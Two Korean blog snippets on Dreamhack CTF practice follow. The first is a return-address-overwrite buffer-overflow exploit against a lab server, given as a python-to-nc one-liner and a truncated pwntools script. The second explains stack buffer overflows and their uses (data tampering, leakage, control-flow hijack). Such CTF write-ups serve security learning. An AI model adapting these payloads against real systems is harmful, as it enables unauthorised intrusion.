Host: host1.dreamhack.games Port: 10469/tcp 1. python 공격 코드 이용 (python -c "print('A'*0x30 + 'B'*0x8 + '\xaa\x06\x40\x00\x00\x00\x00\x00')";cat)| nc host1.dreamhack.games 10469 2. pwntools 이용 from pwn import * p = remote('host1.dreamhack.games',10469) # 원격 서버 대상으로 익스플로잇 수행 context.arch="amd64" # x86-64 payload = 'A' * 0x30 payload += 'B' * 0x08 payload += '\xaa\x06\x40\x00\x00\x00\x00\x00' # get_..

스택 오버플로우 VS 스택 버퍼 오버플로우 스택 오버플로우 : 스택영역이 너무 많이 확장돼서 발생하는 버그 스택 버퍼 오버플로우 : 스택에 위치한 버퍼에 버퍼의 크기보다 많은 데이터가 입력되어 발생하는 버그 (스택의 버퍼에서 발생하는 오버플로우) 버퍼(buffer)란? 데이터가 목적지로 이동되기 전에 보관되는 임시 저장소 스택 버퍼 : 스택에 있는 지역변수 힙 버퍼 : 힙에 할당된 메모리 영역 Ex1) 데이터 변조 - 버퍼 오버플로우로 인해 뒤의 데이터 값을 변조시킬 수 있다. Ex2) 데이터 유출 c언어에서 문자열의 끝을 null로 인식하는데 버퍼 오버플로우를 통해 null을 없애주면 뒤의 데이터까지 함께 읽는 것이 가능해진다. Ex3) 실행흐름조작 예를 들면 함수의 ret에 자신이 실행하고 싶은 명령..